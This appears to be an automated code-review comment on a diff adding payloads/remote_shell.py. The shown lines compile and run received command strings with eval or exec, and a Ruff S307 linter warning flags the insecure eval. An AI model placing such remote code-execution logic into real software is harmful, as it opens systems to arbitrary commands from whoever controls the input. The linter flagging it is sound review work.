payloads/remote_shell.py

```
@@ -0,0 +1,215 @@
+        try:
+            code_obj = compile(cmd, "<remote>", "eval")
+            mode = "eval"
+            log("Compiled as eval.")
+        except SyntaxError:
+            code_obj = compile(cmd, "<remote>", "exec")
+            mode = "exec"
+            log("Compiled as exec.")
+
+        try:
+            if mode == "eval":
+                result = eval(code_obj, ctx, ctx)
```

Ruff (0.14.4)

Use of possibly insecure function; consider using `ast.literal_eval`

(S307)